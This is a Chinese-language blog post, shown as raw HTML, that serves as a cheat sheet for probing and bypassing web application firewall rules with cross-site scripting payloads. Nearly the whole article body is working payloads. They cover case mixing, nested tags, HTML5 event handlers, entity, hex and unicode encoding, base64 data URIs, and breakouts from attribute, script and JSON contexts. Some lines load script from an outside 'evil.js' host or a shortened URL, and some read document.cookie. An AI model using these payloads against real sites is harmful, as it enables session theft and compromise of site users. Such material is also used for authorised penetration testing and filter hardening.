<!doctype html>
<html class="theme-next use-motion ">
<head>
  

<meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>


<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />






  <link rel="stylesheet" type="text/css" href="/vendors/fancybox/source/jquery.fancybox.css?v=2.1.5"/>




<link rel="stylesheet" type="text/css" href="/css/main.css?v=0.4.5.1"/>


    <meta name="description" content="jsut 4 fun" />



  <meta name="keywords" content="XSS," />



  <link rel="alternate" href="/atom.xml" title="Go7hic" type="application/atom+xml" />



  <link rel="shorticon icon" type="image/x-icon" href="/favicon.ico?v=0.4.5.1" />


<meta name="description" content="1、使用无害的payload，类似&amp;lt;b&amp;gt;,&amp;lt;i&amp;gt;,&amp;lt;u&amp;gt;观察响应，判断应用程序是否被HTML编码，是否标签被过滤，是否过滤&amp;lt;&amp;gt;等等；
2、如果过滤闭合标签，尝试无闭合标签的payload（&amp;lt;b,&amp;lt;i,&amp;lt;marquee）观察响应；
3、尝试以下的payload1234&amp;lt;script&amp;gt;alert(1);&amp;lt;/script">
<meta property="og:type" content="article">
<meta property="og:title" content="XSS现代WAF规则探测及绕过技术">
<meta property="og:url" content="http://blog.yongyuan.us/2013/12/09/XSS现代WAF规则探测及绕过技术/index.html">
<meta property="og:site_name" content="Go7hic">
<meta property="og:description" content="1、使用无害的payload，类似&amp;lt;b&amp;gt;,&amp;lt;i&amp;gt;,&amp;lt;u&amp;gt;观察响应，判断应用程序是否被HTML编码，是否标签被过滤，是否过滤&amp;lt;&amp;gt;等等；
2、如果过滤闭合标签，尝试无闭合标签的payload（&amp;lt;b,&amp;lt;i,&amp;lt;marquee）观察响应；
3、尝试以下的payload1234&amp;lt;script&amp;gt;alert(1);&amp;lt;/script">
<meta property="og:updated_time" content="2015-09-03T17:21:08.000Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="XSS现代WAF规则探测及绕过技术">
<meta name="twitter:description" content="1、使用无害的payload，类似&amp;lt;b&amp;gt;,&amp;lt;i&amp;gt;,&amp;lt;u&amp;gt;观察响应，判断应用程序是否被HTML编码，是否标签被过滤，是否过滤&amp;lt;&amp;gt;等等；
2、如果过滤闭合标签，尝试无闭合标签的payload（&amp;lt;b,&amp;lt;i,&amp;lt;marquee）观察响应；
3、尝试以下的payload1234&amp;lt;script&amp;gt;alert(1);&amp;lt;/script">


<script type="text/javascript" id="hexo.configuration">
  var CONFIG = {
    scheme: '',
    sidebar: 'post'
  };
</script>

  <title> XSS现代WAF规则探测及绕过技术 | Go7hic </title>
</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  <!--[if lte IE 8]>
  <div style=' clear: both; height: 59px; padding:0 0 0 15px; position: relative;margin:0 auto;'>
    <a href="http://windows.microsoft.com/en-US/internet-explorer/products/ie/home?ocid=ie6_countdown_bannercode">
      <img src="http://7u2nvr.com1.z0.glb.clouddn.com/picouterie.jpg" border="0" height="42" width="820"
           alt="You are using an outdated browser. For a faster, safer browsing experience, upgrade for free today or use other browser ,like chrome firefox safari."
           style='margin-left:auto;margin-right:auto;display: block;'/>
    </a>
  </div>
<![endif]-->
  



  <div class="container one-column page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><h1 class="site-meta">
  <span class="logo-line-before"><i></i></span>
  <a href="/" class="brand" rel="start">
      <span class="logo">
        <i class="icon-next-logo"></i>
      </span>
      <span class="site-title">Go7hic</span>
  </a>
  <span class="logo-line-after"><i></i></span>
</h1>

<div class="site-nav-toggle">
  <button>
    <span class="btn-bar"></span>
    <span class="btn-bar"></span>
    <span class="btn-bar"></span>
  </button>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu ">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            <i class="menu-item-icon icon-next-home"></i> <br />
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives" rel="section">
            <i class="menu-item-icon icon-next-archives"></i> <br />
            归档
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags" rel="section">
            <i class="menu-item-icon icon-next-tags"></i> <br />
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about" rel="section">
            <i class="menu-item-icon icon-next-about"></i> <br />
            关于
          </a>
        </li>
      

      
      
    </ul>
  

  
</nav>

 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div id="content" class="content"> 

  <div id="posts" class="posts-expand">
    

  <article class="post post-type-normal " itemscope itemtype="http://schema.org/Article">
    <header class="post-header">

      
      
        <h1 class="post-title" itemprop="name headline">
          
          
            
              XSS现代WAF规则探测及绕过技术
            
          
        </h1>
      

      <div class="post-meta">
        <span class="post-time">
          发表于
          <time itemprop="dateCreated" datetime="2013-12-09T11:21:04+08:00" content="2013-12-09">
            2013-12-09
          </time>
        </span>

        

        
          
        
      </div>
    </header>

    <div class="post-body">

      
      

      
        <span itemprop="articleBody"><p>1、使用无害的payload，类似<code>&lt;b&gt;</code>,<code>&lt;i&gt;</code>,<code>&lt;u&gt;</code>观察响应，判断应用程序是否被HTML编码，是否标签被过滤，是否过滤&lt;&gt;等等；</p>
<p>2、如果过滤闭合标签，尝试无闭合标签的<code>payload（&lt;b,&lt;i,&lt;marquee）</code>观察响应；</p>
<p>3、尝试以下的payload<br><figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="title">script</span>&gt;</span><span class="dns">alert(1)<span class="comment">;</span></span><span class="tag">&lt;/<span class="title">script</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="title">script</span>&gt;</span><span class="dns">prompt(1)<span class="comment">;</span></span><span class="tag">&lt;/<span class="title">script</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="title">script</span>&gt;</span><span class="dns">confirm      (1)<span class="comment">;</span></span><span class="tag">&lt;/<span class="title">script</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="title">script</span> <span class="attribute">src</span>=<span class="value">"http://rhainfosec.com/evil.js"</span>&gt;</span><span class="undefined"></span></span><br></pre></td></tr></table></figure></p>
<p>判断是否触发过滤规则，尝试使用大小写混合字符<br><figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="title">scRiPt</span>&gt;</span><span class="dns">alert(1)<span class="comment">;</span></span><span class="tag">&lt;/<span class="title">scrIPt</span>&gt;</span></span><br></pre></td></tr></table></figure></p>
<p>1、如果大小写不行的话，<code>&lt;script&gt;</code>被过滤尝试<code>&lt;scr&lt;script&gt;ipt&gt;alert(1)&lt;/scr&lt;script&gt;ipt&gt;</code>；</p>
<p>2、使用<code>&lt;a&gt;</code>标签测试<br><figure class="highlight stylus"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;<span class="tag">a</span>  href=“http:<span class="comment">//www.google.com"&gt;Clickme&lt;/a&gt;</span></span><br></pre></td></tr></table></figure></p>
<p><code>&lt;a</code>被过滤？</p>
<p><code>href</code>被过滤？</p>
<p>其他内容被过滤？</p>
<p>如果没有过滤尝试使用<code>&lt;a href=”javascript:alert(1)”&gt;Clickme&lt;/a&gt;</code></p>
<p>尝试使用错误的事件查看过滤<code>&lt;a href=”rhainfosec.com” onclimbatree=alert(1)&gt;ClickHere&lt;/a&gt;</code></p>
<p>HTML5拥有150个事件处理函数，可以多尝试其他函数<code>&lt;body/onhashchange=alert(1)&gt;&lt;a href=#&gt;clickit</code></p>
<p>测试其他标签</p>
<p>src属性<br><figure class="highlight django"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="xml"><span class="tag">&lt;<span class="title">img</span> <span class="attribute">src</span>=<span class="value">x</span>      <span class="attribute">onerror</span>=<span class="value">prompt(1);</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="title">img</span>/<span class="attribute">src</span>=<span class="value">aaa.jpg</span>      <span class="attribute">onerror</span>=<span class="value">prompt(1);</span></span><br><span class="line">&lt;<span class="attribute">video</span> <span class="attribute">src</span>=<span class="value">x</span>      <span class="attribute">onerror</span>=<span class="value">prompt(1);</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="title">audio</span> <span class="attribute">src</span>=<span class="value">x</span>      <span class="attribute">onerror</span>=<span class="value">prompt(1);</span>&gt;</span></span></span><br></pre></td></tr></table></figure></p>
<p>iframe<br><figure class="highlight nix"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&lt;<span class="variable">iframesrc=</span><span class="string">"javascript:alert(2)"</span>&gt;</span><br><span class="line">&lt;iframe/<span class="variable">src=</span><span class="string">"data:text&amp;sol;html;&amp;Tab;base64&amp;NewLine;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg=="</span>&gt;</span><br></pre></td></tr></table></figure></p>
<p>Embed<br><figure class="highlight gradle"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;embed<span class="regexp">/src=/</span><span class="regexp">/goo.gl/</span>nlX0P&gt;</span><br></pre></td></tr></table></figure></p>
<p>Action<br><figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="title">form</span> <span class="attribute">action</span>=<span class="value">"Javascript:alert(1)"</span>&gt;</span><span class="tag">&lt;<span class="title">input</span> <span class="attribute">type</span>=<span class="value">submit</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="title">isindex</span> <span class="attribute">action</span>=<span class="value">"javascript:alert(1)"</span> <span class="attribute">type</span>=<span class="value">image</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="title">isindex</span> <span class="attribute">action</span>=<span class="value">j&amp;Tab;a&amp;Tab;vas&amp;Tab;c&amp;Tab;r&amp;Tab;ipt:alert(1)</span> <span class="attribute">type</span>=<span class="value">image</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="title">isindex</span> <span class="attribute">action</span>=<span class="value">data:text</span>/<span class="attribute">html</span>, <span class="attribute">type</span>=<span class="value">image</span>&gt;</span></span><br></pre></td></tr></table></figure></p>
<p>mario验证<br><figure class="highlight lasso"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="subst">&lt;</span>formaction<span class="subst">=&amp;</span><span class="variable">#039</span>;<span class="built_in">data</span>:text<span class="subst">&amp;</span>sol;html,<span class="subst">&amp;</span><span class="literal">lt</span>;script<span class="subst">&amp;</span><span class="literal">gt</span>;alert(<span class="number">1</span>)<span class="subst">&amp;</span><span class="literal">lt</span>/script<span class="subst">&amp;</span><span class="literal">gt</span><span class="subst">&amp;</span><span class="variable">#039</span>;<span class="subst">&gt;&lt;</span>button<span class="subst">&gt;</span>CLICK</span><br></pre></td></tr></table></figure></p>
<p>“formaction”属性<br><figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="title">isindexformaction="javascript:alert(1)"</span>      <span class="attribute">type</span>=<span class="value">image</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="title">input</span> <span class="attribute">type</span>=<span class="value">"image"</span> <span class="attribute">formaction</span>=<span class="value">JaVaScript:alert(0)</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="title">form</span>&gt;</span><span class="tag">&lt;<span class="title">button</span> <span class="attribute">formaction</span>=<span class="value">javascript&amp;colon;alert(1)</span>&gt;</span>CLICKME</span><br></pre></td></tr></table></figure></p>
<p>“background”属性<br><figure class="highlight stylus"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;<span class="tag">table</span> <span class="attribute">background</span>=javascript:<span class="function"><span class="title">alert</span><span class="params">(<span class="number">1</span>)</span></span>&gt;&lt;/table&gt; <span class="comment">// Works on Opera 10.5      and IE6</span></span><br></pre></td></tr></table></figure></p>
<p>“posters” 属性<br><figure class="highlight stylus"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;<span class="tag">video</span> poster=javascript:<span class="function"><span class="title">alert</span><span class="params">(<span class="number">1</span>)</span></span><span class="comment">//&gt;&lt;/video&gt; // Works Upto Opera 10.5</span></span><br></pre></td></tr></table></figure></p>
<p>“data”属性<br><figure class="highlight haskell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&lt;object <span class="typedef"><span class="keyword">data</span>="<span class="keyword">data</span>:text/html;base64,<span class="type">PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4</span>="&gt;</span></span><br><span class="line">&lt;object/<span class="typedef"><span class="keyword">data</span>=//goo.gl/nlX0P?</span></span><br></pre></td></tr></table></figure></p>
<p>“code”属性</p>
<pre><code><span class="tag">&lt;<span class="title">applet</span> <span class="attribute">code</span>=<span class="value">"javascript:confirm(document.cookie);"</span>&gt;</span> // Firefox Only
<span class="tag">&lt;<span class="title">embed</span>  <span class="attribute">code</span>=<span class="value">"http://businessinfo.co.uk/labs/xss/xss.swf"</span>      <span class="attribute">allowscriptaccess</span>=<span class="value">always</span>&gt;</span>
</code></pre><p>事件处理</p>
<pre><code><span class="tag">&lt;<span class="title">svg</span>/<span class="attribute">onload</span>=<span class="value">prompt(1);</span>&gt;</span>
<span class="tag">&lt;<span class="title">marquee</span>/<span class="attribute">onstart</span>=<span class="value">confirm(2)</span>&gt;</span>/
<span class="tag">&lt;<span class="title">body</span> <span class="attribute">onload</span>=<span class="value">prompt(1);</span>&gt;</span>
<span class="tag">&lt;<span class="title">select</span> <span class="attribute">autofocus</span> <span class="attribute">onfocus</span>=<span class="value">alert(1)</span>&gt;</span>
<span class="tag">&lt;<span class="title">textarea</span> <span class="attribute">autofocus</span> <span class="attribute">onfocus</span>=<span class="value">alert(1)</span>&gt;</span>
<span class="tag">&lt;<span class="title">keygen</span> <span class="attribute">autofocus</span> <span class="attribute">onfocus</span>=<span class="value">alert(1)</span>&gt;</span>
<span class="tag">&lt;<span class="title">video</span>&gt;</span><span class="tag">&lt;<span class="title">source</span> <span class="attribute">onerror</span>=<span class="value">"javascript:alert(1)"</span>&gt;</span>
</code></pre><p>短payload</p>
<pre><code>&lt;q/oncut=<span class="function"><span class="title">open</span><span class="params">()</span></span>&gt;
&lt;q/oncut=<span class="function"><span class="title">alert</span><span class="params">(<span class="number">1</span>)</span></span>&gt; <span class="comment">//      Useful in-case of payload restrictions.</span>
</code></pre><p>嵌套欺骗</p>
<pre><code>&lt;marquee&lt;marquee/onstart=confirm(2)&gt;/onstart=confirm(1)&gt;
&lt;body  language=vbsonload=alert-1 // Works with IE8
&lt;command onmouseover="<span class="command">\x</span>6A<span class="command">\x</span>61<span class="command">\x</span>76<span class="command">\x</span>61<span class="command">\x</span>53<span class="command">\x</span>43<span class="command">\x</span>52<span class="command">\x</span>49<span class="command">\x</span>50<span class="command">\x</span>54<span class="command">\x</span>26<span class="command">\x</span>63<span class="command">\x</span>6F<span class="command">\x</span>6C<span class="command">\x</span>6F<span class="command">\x</span>6E<span class="command">\x</span>3B<span class="command">\x</span>63<span class="command">\x</span>6F<span class="command">\x</span>6E<span class="command">\x</span>66<span class="command">\x</span>6    9<span class="command">\x</span>72<span class="command">\x</span>6D<span class="command">\x</span>26<span class="command">\x</span>6C<span class="command">\x</span>70<span class="command">\x</span>61<span class="command">\x</span>72<span class="command">\x</span>3B<span class="command">\x</span>31<span class="command">\x</span>26<span class="command">\x</span>72<span class="command">\x</span>70<span class="command">\x</span>61<span class="command">\x</span>72<span class="command">\x</span>3B"&gt;Save&lt;/command&gt;      // Works with IE8
</code></pre><p>圆括号被过滤</p>
<pre><code>&lt;<span class="keyword">a</span> onmouseover=<span class="string">"javascript:window.onerror=alert;throw 1&gt;
</span>&lt;img src=<span class="keyword">x</span> onerror=<span class="string">"javascript:window.onerror=alert;throw 1"</span>&gt;
&lt;body/onload=javascrip<span class="variable">t:window</span>.onerror=<span class="built_in">eval</span>;<span class="keyword">throw</span>&amp;#<span class="number">039</span>;=alert\x281\x29&amp;#<span class="number">039</span>;;
</code></pre><p>Expression 属性</p>
<pre><code><span class="tag">&lt;<span class="title">img</span> <span class="attribute">style</span>=<span class="value">"xss:expression(alert(0))"</span>&gt;</span> // Works upto IE7.
<span class="tag">&lt;<span class="title">div</span> <span class="attribute">style</span>=<span class="value">"color:rgb(&amp;#039;&amp;#039;x:expression(alert(1))"</span>&gt;</span><span class="tag">&lt;/<span class="title">div</span>&gt;</span>      // Works upto IE7.
<span class="tag">&lt;<span class="title">style</span>&gt;</span><span class="css"><span class="id">#test</span><span class="rules">{<span class="rule"><span class="attribute">x</span>:<span class="value"><span class="function">expression</span>(<span class="function">alert</span>(/XSS/))}</span></span></span></span><span class="tag">&lt;/<span class="title">style</span>&gt;</span>      // Works upto IE7
</code></pre><p>“location”属性</p>
<pre><code>&lt;<span class="tag">a</span> onmouseover=location=’javascript:<span class="function"><span class="title">alert</span><span class="params">(<span class="number">1</span>)</span></span>&gt;click
&lt;<span class="tag">body</span> onfocus=<span class="string">"location=&amp;#039;javascrpt:alert(1) &gt;123</span>
</code></pre><p>其他Payload</p>
<pre><code><span class="xml"><span class="tag">&lt;<span class="title">meta</span> <span class="attribute">http-equiv</span>=<span class="value">"refresh"</span>      <span class="attribute">content</span>=<span class="value">"0;url=//goo.gl/nlX0P"</span>&gt;</span>
<span class="tag">&lt;<span class="title">meta</span> <span class="attribute">http-equiv</span>=<span class="value">"refresh"</span>      <span class="attribute">content</span>=<span class="value">"0;javascript&amp;colon;alert(1)"</span>/&gt;</span>
<span class="tag">&lt;<span class="title">svg</span> <span class="attribute">xmlns</span>=<span class="value">"http://www.w3.org/2000/svg"</span>&gt;</span><span class="tag">&lt;<span class="title">g</span>      <span class="attribute">onload</span>=<span class="value">"javascript:\u0061lert(1);"</span>&gt;</span><span class="tag">&lt;/<span class="title">g</span>&gt;</span><span class="tag">&lt;/<span class="title">svg</span>&gt;</span> //      By @secalert
<span class="tag">&lt;<span class="title">svg</span> <span class="attribute">xmlns:xlink</span>=<span class="value">" r=100 /&gt;&lt;animate attributeName="</span><span class="value">xlink:href"</span>      <span class="attribute">values</span>=<span class="value">";javascript:alert(1)"</span> <span class="attribute">begin</span>=<span class="value">"0s"</span>      <span class="attribute">dur</span>=<span class="value">"0.1s"</span> <span class="attribute">fill</span>=<span class="value">"freeze"</span>/&gt;</span> // By Mario
<span class="tag">&lt;<span class="title">svg</span>&gt;</span><span class="cdata">&lt;![CDATA[&gt;&lt;imagexlink:href="]]&gt;</span><span class="tag">&lt;<span class="title">img</span>/<span class="attribute">src</span>=<span class="value">xx:xonerror=alert(2)</span>//"&lt;/<span class="attribute">svg</span>&gt;</span>      // By @secalert
<span class="tag">&lt;<span class="title">meta</span> <span class="attribute">content</span>=<span class="value">"&amp;NewLine; 1 &amp;NewLine;;JAVASCRIPT&amp;colon; alert(1)"</span> <span class="attribute">http-equiv</span>=<span class="value">"refresh"</span>/&gt;</span>
<span class="tag">&lt;<span class="title">math</span>&gt;</span><span class="tag">&lt;<span class="title">a</span> <span class="attribute">xlink:href</span>=<span class="value">"//jsfiddle.net/t846h/"</span>&gt;</span>click // By Ashar Javed</span>
</code></pre><p>（）；：被过滤</p>
<pre><code>&lt;svg&gt;&lt;<span class="keyword">script</span>&gt;alert&amp;<span class="comment">#40/1/&amp;#41&lt;/script&gt;      // Works With All Browsers</span>
( <span class="keyword">is</span> html encoded <span class="keyword">to</span> &amp;<span class="comment">#40</span>
) <span class="keyword">is</span> html encoded <span class="keyword">to</span> &amp;<span class="comment">#41</span>
</code></pre><p>Opera的变量</p>
<pre><code><span class="tag">&lt;<span class="title">svg</span>&gt;</span><span class="tag">&lt;<span class="title">script</span>&gt;</span><span class="cal">alert&amp;<span class="string">#40</span>      <span class="number">1</span>&amp;<span class="string">#41</span> // Works <span class="keyword">with</span> Opera Only</span>
</code></pre><p>实体解码</p>
<figure class="highlight gcode"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&amp;<span class="keyword">lt</span>;/script&amp;<span class="keyword">gt</span>;&amp;<span class="keyword">lt</span>;script&amp;<span class="keyword">gt</span>;alert<span class="comment">(1)</span>&amp;<span class="keyword">lt</span>;/script&amp;<span class="keyword">gt</span>;</span><br><span class="line">&lt;a  href=<span class="string">"j&amp;#x26;#x26#x41;vascript:alert%252831337%2529"</span>&gt;Hello&lt;/a&gt;</span><br></pre></td></tr></table></figure>
<p>编码</p>
<p>JavaScript是很灵活的语言，可以使用十六进制、Unicode、HTML等进行编码，以下属性可以被编码（支持HTML, Octal, Decimal,Hexadecimal, and Unicode）<br><figure class="highlight makefile"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="constant">href</span>=</span><br><span class="line"><span class="constant">action</span>=</span><br><span class="line"><span class="constant">formaction</span>=</span><br><span class="line"><span class="constant">location</span>=</span><br><span class="line"><span class="constant">on</span>*=</span><br><span class="line"><span class="constant">name</span>=</span><br><span class="line"><span class="constant">background</span>=</span><br><span class="line"><span class="constant">poster</span>=</span><br><span class="line"><span class="constant">src</span>=</span><br><span class="line"><span class="constant">code</span>=</span><br><span class="line"><span class="constant">data</span>= //只支持base64</span><br></pre></td></tr></table></figure></p>
<p>基于上下文的过滤</p>
<p>WAF最大的问题是不能理解内容，使用黑名单可以阻挡独立的js脚本，但仍不能对xss提供足够的保护，如果一个反射型的XSS是下面这种形式</p>
<p>输入反射属性</p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="title">input</span> <span class="attribute">value</span>=<span class="value">"XSStest"</span> <span class="attribute">type</span>=<span class="value">text</span>&gt;</span></span><br></pre></td></tr></table></figure>
<p>我们可以使用 <code>&quot;&gt;&lt;imgsrc=x  onerror=prompt(0);&gt;</code>触发，但是如果&lt;&gt;被过滤，我们仍然可以使用<code>&quot; autofocusonfocus=alert(1)//</code>触发，基本是使用“ 关闭value属性，再加入我们的执行脚本<br><figure class="highlight nix"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">" onmouseover="</span>prompt(<span class="number">0</span>) <span class="variable">x=</span><span class="string">"</span><br><span class="line">"</span> <span class="variable">onfocusin=</span>alert(<span class="number">1</span>) autofocus <span class="variable">x=</span><span class="string">"</span><br><span class="line">"</span> <span class="variable">onfocusout=</span>alert(<span class="number">1</span>) autofocus <span class="variable">x=</span><span class="string">"</span><br><span class="line">"</span> <span class="variable">onblur=</span>alert(<span class="number">1</span>) autofocus <span class="variable">a=</span><span class="string">"</span></span><br></pre></td></tr></table></figure></p>
<p>输入反射在<code>&lt;script&gt;</code>标签内</p>
<p>类似这种情况：<br><figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="title">script</span>&gt;</span><span class="stata"></span><br><span class="line"><span class="keyword">Var</span></span><br><span class="line">x=”<span class="keyword">Input</span>”;</span><br><span class="line"></span><span class="tag">&lt;/<span class="title">script</span>&gt;</span></span><br></pre></td></tr></table></figure></p>
<p>通常，我们使用<code>“&gt;&lt;/script&gt;</code>,闭合前面的<code>&lt;/script&gt;</code>标签，然而在这种情况，我们也可以直接输入执行脚本<code>alert()</code>, <code>prompt()</code><br>confirm() ，例如：<br><figure class="highlight gcode"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">“;alert<span class="comment">(1)</span><span class="comment">//</span></span><br></pre></td></tr></table></figure></p>
<h2 id="非常规事件监听">非常规事件监听</h2><p>DOMfocusin,DOMfocusout,等事件，这些需要特定的事件监听适当的执行。例如：<br><figure class="highlight openscad"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">";document.body.addEventListener("</span>DOMActivate<span class="string">",alert(1))//</span><br><span class="line">"</span>;document.body.addEventListener<span class="params">(<span class="string">"DOMActivate"</span>,prompt<span class="params">(<span class="number">1</span>)</span>)</span><span class="comment">//</span></span><br><span class="line"><span class="string">";document.body.addEventListener("</span>DOMActivate<span class="string">",confirm(1))//</span></span><br></pre></td></tr></table></figure></p>
<p>此类事件的列表<br><figure class="highlight nginx"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="title">DOMAttrModified</span></span><br><span class="line">DOMCharacterDataModified</span><br><span class="line">DOMFocusIn</span><br><span class="line">DOMFocusOut</span><br><span class="line">DOMMouseScroll</span><br><span class="line">DOMNodeInserted</span><br><span class="line">DOMNodeInsertedIntoDocument</span><br><span class="line">DOMNodeRemoved</span><br><span class="line">DOMNodeRemovedFromDocument</span><br><span class="line">DOMSubtreeModified</span><br></pre></td></tr></table></figure></p>
<p>超文本内容</p>
<p>代码中的情况如下<br><figure class="highlight stylus"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">&lt;<span class="tag">a</span></span><br><span class="line">href=”Userinput”&gt;Click&lt;/a&gt;</span><br><span class="line">可以使用javascript:<span class="function"><span class="title">alert</span><span class="params">(<span class="number">1</span>)</span></span><span class="comment">//直接执行&lt;a</span></span><br><span class="line">href=”javascript:<span class="function"><span class="title">alert</span><span class="params">(<span class="number">1</span>)</span></span><span class="comment">//”&gt;Click&lt;/a&gt;</span></span><br></pre></td></tr></table></figure></p>
<p>变形</p>
<p>主要包含大小写和JavaScript变形<br><figure class="highlight scss"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">javascript&amp;<span class="id">#058</span>;<span class="function">alert</span>(1)</span><br><span class="line">javaSCRIPT&amp;colon;<span class="function">alert</span>(1)</span><br><span class="line">JaVaScRipT<span class="value">:<span class="function">alert</span>(<span class="number">1</span>)</span><br><span class="line">javas&amp;Tab;</span>cript<span class="value">:\<span class="function">u0061lert</span>(<span class="number">1</span>);</span></span><br><span class="line">javascript<span class="value">:\u0061lert&amp;#x28;</span>1&amp;<span class="id">#x29</span></span><br><span class="line">javascript&amp;<span class="id">#x3A</span>;alert&amp;lpar;document&amp;period;cookie&amp;rpar;      <span class="comment">// AsharJaved</span></span><br></pre></td></tr></table></figure></p>
<p>IE10以下和URI中可以使用VBScript<br><figure class="highlight css"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="rule"><span class="attribute">vbscript</span>:<span class="value"><span class="function">alert</span>(<span class="number">1</span>)</span></span>;</span><br><span class="line"><span class="tag">vbscript</span>&amp;<span class="id">#058</span>;<span class="tag">alert</span>(1);</span><br><span class="line"><span class="tag">vbscr</span>&amp;<span class="tag">Tab</span>;<span class="rule"><span class="attribute">ipt</span>:<span class="value"><span class="function">alert</span>(<span class="number">1</span>)<span class="string">"</span></span></span></span><br></pre></td></tr></table></figure></p>
<p>Data URl<br><figure class="highlight gcode"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">data:text/html;base<span class="number">64</span>,PH<span class="label">NjcmlwdD5</span>hbGVydCgxKTw<span class="title">vc2</span><span class="label">NyaXB0</span>Pg==</span><br></pre></td></tr></table></figure></p>
<h2 id="JSON内容">JSON内容</h2><p>反射输入<br><figure class="highlight stylus"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="title">encodeURIComponent</span><span class="params">(&amp;<span class="hexcolor">#039</span>;userinput&amp;<span class="hexcolor">#039</span>;)</span></span></span><br></pre></td></tr></table></figure></p>
<p>可以使用<br><figure class="highlight stylus"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">-<span class="function"><span class="title">alert</span><span class="params">(<span class="number">1</span>)</span></span>-</span><br><span class="line">-<span class="function"><span class="title">prompt</span><span class="params">(<span class="number">1</span>)</span></span>-</span><br><span class="line">-<span class="function"><span class="title">confirm</span><span class="params">(<span class="number">1</span>)</span></span>-</span><br></pre></td></tr></table></figure></p>
